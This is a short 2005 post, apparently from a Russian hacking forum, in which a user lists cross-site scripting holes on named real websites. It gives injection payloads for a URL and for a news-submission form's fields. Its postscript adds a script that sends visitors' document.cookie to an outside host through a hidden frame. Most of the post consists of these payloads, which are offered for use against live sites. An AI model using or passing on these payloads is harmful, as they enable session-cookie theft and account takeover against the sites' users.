Тема: Бажные сайты от k1b0rg'a
Показать сообщение отдельно

  #46  
Старый 22.11.2005, 23:15
k1b0rg
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553

Репутация: 1316


По умолчанию
http://www.npj.ru/in/dura-lex-group/by/pvp/42564"%20style=background:url(javascript:alert()); "

http://www.uinc.ru/news/sendnews.php
тема:" style=background:url(javascript:alert(1));"
Сообщение:</textarea><script>alert(2)</script>
Ваше имя:" style=background:url(javascript:alert(3));"
Ваш E-mail:" style=background:url(javascript:alert(4));"
Введите код, указанный на картинке: НЕ ввожим, жмем отправить получаем alert
может быть это и активная xss, хз я не проверял.

p.s. Tem
в скрытом фрейме можешь просто написать
<script>img = new Image(); img.src="http://antichat.ru/cgi-bin/s.jpg"+document.cookie;</script>
а не видно, наверное потому он и скрытый